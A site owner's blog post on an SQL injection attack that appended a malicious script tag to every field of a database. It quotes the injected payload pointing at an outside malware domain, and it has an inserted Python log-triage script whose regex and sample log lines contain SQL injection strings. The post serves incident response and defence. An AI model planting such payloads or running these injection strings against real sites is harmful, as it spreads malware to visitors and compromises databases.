lolypopholypop.com hackers
We had an old website compromised by an SQL injection attack originating from IP address 96.9.149.82 (an address in the United States). The attack appended the following text to every field of every table in the database:
"></title><script src="http://lilupophilupop.com/sl.php"></script><!--
This means that any page which has a dynamically generated title tag would have installed the malicious code referenced in the script tag. The JavaScript code then has a redirect in it to hop to other Russian-based malware sites, which in turn sometimes redirect people to different malware hosting sites. In this case, it was a fake antivirus screen (how imaginative! - not)
There's more info on the attack here: http://blog.aegislab.com/index.php?op=ViewArticle&articleId=136&blogId=1 (apparently quite a few people were targeted yesterday).
Fortunately, we managed to restore the database without loss of data, and using the IIS logs we identified the vulnerable script and fixed it (something that a previous developer a few years ago left unpatched). However, I would think that there are a lot of other people who have wasted a few valuable hours on this. Look for the domain 'lilupophilupop.com' in Google and there are over a thousand results already, and the virus has only been active a few days.
This looks to be a reappearance of the Lizamoon malware which infected up to 1,000,000 websites last September (the actual number of infections is impossible to measure since many websites don't like to admit when they have been hacked into).
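One way to do the IIS log triage described above, as an added example that is not code from the original post: it parses W3C-format IIS logs, flags requests whose decoded query string contains SQL injection markers, and ranks the scripts that received them. The marker regex, the script names and the sample log lines are assumptions constructed for illustration; only the IP address comes from the post.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Generic SQL injection markers (an assumption; tune them to your application).
SQLI = re.compile(r"(declare\s+@|cast\s*\(|exec\s*\(|varchar\s*\(|;\s*(update|insert|drop)\b|'\s*(or|and)\s)", re.I)

# Constructed sample in IIS W3C extended format; script names are hypothetical.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2011-07-18 03:11:02 GET /products.asp id=12 192.0.2.10 200
2011-07-18 03:14:40 GET /news.asp id=5;DECLARE%20@s%20VARCHAR(8000);EXEC(@s) 96.9.149.82 200
2011-07-18 03:14:41 GET /news.asp id=6;declare+@s+varchar(8000);exec(@s) 96.9.149.82 200
2011-07-18 03:14:43 GET /search.asp q=cast+iron+pans 198.51.100.7 200
2011-07-18 03:15:09 GET /default.asp - 96.9.149.82 200
"""


def suspicious_requests(log_text, client_ip=None):
    """Yield (ip, script, decoded_query) for requests whose query matches SQLI."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column order can change mid-file
            continue
        if not line or line.startswith("#") or not fields:
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue                       # skip malformed or truncated rows
        row = dict(zip(fields, values))
        ip = row.get("c-ip", "-")
        if client_ip and ip != client_ip:
            continue
        # IIS stores the query URL-encoded; decode before matching.
        query = unquote_plus(row.get("cs-uri-query", "-"))
        if SQLI.search(query):
            yield ip, row.get("cs-uri-stem", "-"), query


def rank_scripts(log_text, client_ip=None):
    """Count suspicious hits per script so the likely injection point stands out."""
    return Counter(s for _, s, _ in suspicious_requests(log_text, client_ip)).most_common()


if __name__ == "__main__":
    for script, hits in rank_scripts(SAMPLE_LOG):
        print(f"{hits:4d}  {script}")
```

IIS logs record the query string but not POST bodies by default, so this only surfaces injection attempts sent in the URL.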
** update 7/21/2011 **
Over the last few days, one of the most common search engine referrals for this site has been for 'lilupophilupop.com' or related keywords. This means that the attack was more common than I thought. Hopefully the information here will give some people a clue about how to fix the issue, and how to prevent it from happening in the future, but if you need help with fixing your website, please drop me a message via my contact form.
